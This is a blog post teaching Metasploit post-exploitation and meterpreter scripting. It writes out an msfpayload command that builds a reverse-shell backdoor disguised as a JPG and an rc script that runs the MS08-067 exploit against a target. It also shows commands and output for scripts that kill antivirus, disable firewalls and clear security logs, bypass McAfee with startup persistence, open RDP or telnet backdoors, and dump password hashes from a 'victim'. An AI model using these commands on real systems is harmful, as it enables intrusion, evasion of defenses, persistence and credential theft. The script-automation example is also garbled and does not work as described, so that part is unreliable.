Post Exploitation & Meterpreter Scripting -Metasploit

Posted by ραятн ραтєℓ


Metasploit has now become the king of tools used in penetration testing. It’s comprised of a collection of all available exploits. The tool has its pros and cons; some advantages are:
  • It automates the process of penetration testing
  • Fast (less time require)
  • Reliable
  • It offers a lot of advanced features that we will discuss step by step
Just as a comparison between automatic and manual penetration testing and vulnerability assessment approaches: the automatic process is fast but in some cases does not give the desired result. Manual testing is slow, but more precise and we cannot neglect it. As far as disadvantages go, metasploit does not have one, excepting the possibility that automatic tools do not always work. The point being, metasploit only has the available exploits. If the server’s software is fully patched, then metasploit would fail. (There are many methods of using metasploit. Here, “fail” means to exploit the available vulnerability.) This being the case, we will surely need to implement a manual test to find the 0-day vulnerability. This then is the weakness of metasploit. However, metasploit is the hot topic among penetration testers, and many advances have been made. The security community is currently working to make metasploit even more useful.
Metasploit is based on module system. From this point onward, I will assume that you are aware of basic usage of metasploit, like about msfconsole, meterpreter, exploits, payload and auxiliary module.

Post Exploitation

The main objective in discussing post exploitation is to cover meterpreter scripting. Post exploitation is the technique/ method /procedure or standard to identify and to monitor a target host, to find the way of future access.
What is post exploitation? Why is post exploitation important? Some of these questions are important to understand the phenomena, so let us suppose you have successfully hacked (compromised) a host, but you want to use this session for some other time. It is not a good practice to start things all over again. Moreover, what of you fail next time? Therefore, the best method is to prepare the compromised system for the next use. The other phase of post exploitation is to use the compromised host as an attacker machine and to attack on some other host or network via this compromised machine. Consider the picture below:
Now the above diagram shows the importance of post exploitation. Let us suppose that an attacker has successfully compromised the victim A. Now, the attacker wants to go on the web server, so for victim A, the web server is on the network. To hack on the same network is very easy: instead of a remote attack for this purpose, the attacker can use victim A as its own machine to attack on the network. This is what’s known as the post exploitation phase.
To conclude, the post exploitation attack is the process of:
  • Infrastructure analysis
  • Routing analysis
  • Protocol analysis
  • DNS server analysis
  • ARP analysis
  • Proxy server analysis
  • Host machine analysis (virtual or real host)
  • Services and software’s analysis
  • Sharing analysis
  • Directory, name server and certificates analysis
  • Backup and patch management analysis

Meterpreter Scripting

Meterpreter is a powerful feature of metasploit that uses DLL injection to communicate over the socket. Meterpreter works on the client-side by providing a powerful environment to communicate, to transfer files. A meterpreter session can be established after successfully exploiting the host. Available meterpreter scripts on a metasploit database automate multiple processes, such as:
  • Capture the screen
  • Keylogging
  • File transfer
  • Service detection and more
Even with numerous meterpreter scripts available, you are free to write and to create your own script that is best suited to your work. Some important aspects about the meterpreter script would be:
  • Written in Ruby programming language
  • Located in the metasploit directory
  • Meterpreter scripts are creating everyday by different authors click here to check the list.
  • Meterpreter scripts are very helpful to automate the process after compromising the host
  • Meterpreter scripts are based on API and you can get more information here.
There are so many meterpreter scripts that are available publicly for you to use, but if you want to create a new meterpreter script of your own and for public usage, this is readily doable. All you need to do is to follow some rules and regulations so that your script does not conflict with the standard variables. Ruby programming language is a basic need in order to write a script for meterpreter. Other important rules to follow are:
  • Always use description so that the others will understand it
  • Use local variable not global variable
  • Always provide help option for better usage
  • Keep in mind the target host (operating system, service pack (if windows), Kernel (for Unix) ) while creating a script, because all the system’s software does not contain all types of vulnerabilities
Let us consider an example: in our scenario, we need to create an infected file (a backdoor) so that we can send it to the victim. Metasploit needn’t be that big of a deal; you can even create a backdoor by using fast-track.
root@bt:~/Desktop# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 
LPORT=4444 Desktop > test.jpg
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.2", "LPORT"=>"4444"}

As we have typed all the things in, we can automate the process by creating a new script:
root@bt:/pentest/exploits/framework3# touch a.rb
root@bt:/pentest/exploits/framework3# echo msfpayload windows/meterpreter/reverse_tcp 
LHOST=192.168.1.2 LPORT=4444 Desktop > test.jpg 
root@bt:/pentest/exploits/framework3# ruby a.rb 
root@bt:/pentest/exploits/framework3#

The result is the same. It is also possible to create a jpg file but that method is fast. Since the time-consuming method is repeating the same step, why not create a script for that to do all these jobs automatically? There are different meterpreter scripts are available; just look at the picture below.
This is just one small example. Let’s create a script taking advantage of a vulnerability that will exploit an operating system:
root@bt:/pentest/exploits/framework3# touch test.rc
root@bt:/pentest/exploits/framework3# echo use exploit/windows/smb/ms08_067_netapi
use exploit/windows/smb/ms08_067_netapi
root@bt:/pentest/exploits/framework3# echo set RHOST 192.168.1.6
set RHOST 192.168.1.6
root@bt:/pentest/exploits/framework3# echo exploit
exploit
root@bt:/pentest/exploits/framework3# msfconsole -r test.rc

Figure 4
Beyond this, if we use the manual technique to do then job, then we will need to define:
  • The exploit for this case (well I have used nessus before that is why I know the system is vulnerable to ms08-067-netapi bug)
  • We need to set the remote host manually
  • We need to set local host and port manually
After the execution, the meterpreter session must be active if and only if the operating system is vulnerable, such as in this case:
Now in this meterpreter session, we are able to call different scripts. We can also create our own script as well, as discussed above. Below, I will show you some of the best meterpreter scripts. These are highly useful in the process of penetration testing; however, developers are refining these scripts daily, so be active in the community and on different blogs and forums to keep yourself updated.
Screenspy Script
This is the basic script that will capture the screen of the victim’s computer. All you need to do is type in “run screenspy.” To get help of usage, just type in “run screenspy -h” on the meterpreter screen. After the execution, Firefox will open with a picture of the victim’s computer at that moment.
KillAv Script
Killav script is a pretty famous script. As the name suggests, it will kill (close) antivirus softwares, so if you don’t want that antivirus’ software to disturb you, be sure to kill all of these antivirus softwares by using this script:
meterpreter > run killav
  [*] Killing Antivirus services on the target... 
  meterpreter >

Killav contains the information on most of the better known anti-virus’s, but if there is a new anti-virus, then you will need to edit this script for the best performance. As before with the script file, we can find the famous anti-virus exe name:
  • winppr32.exe
  • winrecon.exe
  • winservn.exe
  • winssk32.exe
  • winstart.exe
  • winstart001.exe
  • wintsk32.exe
  • winupdate.exe
  • wkufind.exe
  • wnad.exe
  • wnt.exe
  • wradmin.exe
  • wrctrl.exe
  • wsbgate.exe
  • wupdater.exe
  • wupdt.exe
  • wyvernworksfirewall.exe
  • xpf202en.exe
  • zapro.exe
  • zapsetup3001.exe
  • zatutor.exe
  • zonalm2601.exe
  • zonealarm.exe
Getcountermeasure Script
Killav is a power script and it can kill a lot of different anti-virus’s, but the problem is that when you implement killav, windows may show some types of errors and other alerts, not to mention firewalls. This is remedied by a wonderful script called Getcountermeasure:
meterpreter > run getcountermeasure -h
  Getcountermeasure -- List (or optionally, kill) HIPS and AV
  processes, show XP firewall rules, and display DEP and UAC
  policies

  OPTIONS:

  -d Disable built in Firewall
  -h Help menu.
  -k Kill any AV, HIPS and Third Party Firewall process found.

Just imagine how powerful this script is! It has an ability to fight against Firewall, Anti-virus, IPS and even third party firewall that are so very common nowadays. It is really better than Killav. To use it:
meterpreter > run getcountermeasure -d 

  [*] Running Getcountermeasure on the target...
  [*] Checking for contermeasures...
  [*] Getting Windows Built in Firewall configuration...
  [*]
  [*]     Domain profile configuration:
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Enable
  [*]     Exception mode = Enable
  [*]
  [*]     Standard profile configuration (current):
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Disable
  [*]     Exception mode = Enable
  [*]
  [*]     Local Area Connection firewall configuration:
  [*]     -------------------------------------------------------------------
  [*]     Operational mode = Enable
  [*]
  [*] Disabling Built in Firewall.....
  [*] Checking DEP Support Policy...
Try to understand the power of this wonderful script: it will remove security logs as well look at the picture.
Gettelnet scriptTelnet is one of the most famous services on the windows operating system. It will allow a remote connection, so if you want to open telnet on the victim’s computer for future use, then it is a good script to use. However, as an advance we can use SSH service for remote connection. We can also install netcat as a backdoor on a compromised host for future connections. Use this command to get more help
  meterpreter > gettelnet -h

There are a lot of different scripts are available but here we will discuss only the most important ones. These will help you to understand the network as well as help you for future connections:
Net Enum- Network Enumeration Script
Netenum is a network enumeration script that is a wonderful script for:
  • Domain Name for DNS Forward Lookup
  • To Perform DNS Forward Lookup on host list and domain
  • The target address range or CIDR identifier
  • To Perform DNS lookup of MX and NS records for a domain
  • To Perform Service Record DNS lookup for a domain
  • To Perform Ping Sweep on IP Range
Checkvm- Check Virtual Machine
Virtual machines are now an important part of enterprise network and most of the large (and even small) networks are using them. Checkvm is a script that will let you monitor the status of the victim, whether on virtual machine or not. It will also let you see the type of virtual machine. Here is the output of this case:
 meterpreter > run checkvm
  [*] Checking if target is a Virtual Machine .....
  [*] This is a Sun VirtualBox Virtual Machine
  meterpreter >

Virus Scan BypassBypasses Mcafee VirusScan Enterprise v8.7.0i+, uploads an executable to TEMP folder, adds it to exclusion list and sets it to run at startup. Though we have discussed two scripts that kill anti-virus protections, it is good to run different scripts to verify your attack.
  meterpreter > run virusscan_bypass -h

Enable RDP- Getgui
If you want a graphical user interface of the victim’s computer, then you need to open a service called RDP (remote desktop protocol):
  meterpreter > run getgui -e
  [*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
  [*] Carlos Perez carlos_perez@darkoperator.com
  [*] Enabling Remote Desktop
  [*]     RDP is disabled; enabling it ...
  [*] Setting Terminal Services service startup mode

Hashdump
Last but not the least: I really don’t want to end this article without sharing hashdump, in case you want to secure password hashes from the victim for future use. In some cases, these hashes works on other platforms:
 meterpreter > run hashdump
  [*] Obtaining the boot key...
  [*] Calculating the hboot key using SYSKEY 374d90e7c3ff37a0d6064c461200ca22...
  [*] Obtaining the user list and keys...
  [*] Decrypting user keys...
  [*] Dumping password hashes...
  Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  HelpAssistant:1000:d298b9b7042eb51df888799802d50eee:fbd49eecf08b5a011f32c57a953b5a99:::
  SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:26b787a3004f92dd4d94d34db9863999:::



Dont Forgot to leave a comment if you like the post 

Categories: